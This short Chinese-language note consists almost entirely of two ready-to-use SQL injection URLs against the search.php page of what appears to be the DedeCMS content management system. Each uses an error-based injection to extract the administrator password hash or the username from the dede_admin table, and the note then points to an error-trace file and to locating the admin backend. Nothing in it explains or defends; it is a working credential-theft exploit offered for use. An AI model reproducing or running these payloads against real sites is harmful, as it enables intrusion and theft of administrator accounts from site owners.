获取密码
网址/plus/search.php?typeArr[1'
or `@\'`=1 and (SELECT 1 FROM (select
count(*),concat(floor(rand(0)*2),(substring((Select pwd from
dede_admin limit 1,1),1,62)))a from information_schema.tables group
by a)b) and
']=11&&kwtype=0&q=1111&searchtype=title
获取账户
网址/plus/search.php?typeArr[1'
or `@\'`=1 and (SELECT 1 FROM (select
count(*),concat(floor(rand(0)*2),(substring((Select uname from
dede_admin limit 1,1),1,62)))a from information_schema.tables group
by a)b) and
']=11&&kwtype=0&q=1111&searchtype=title
/data/mysql_error_trace.inc
查找后台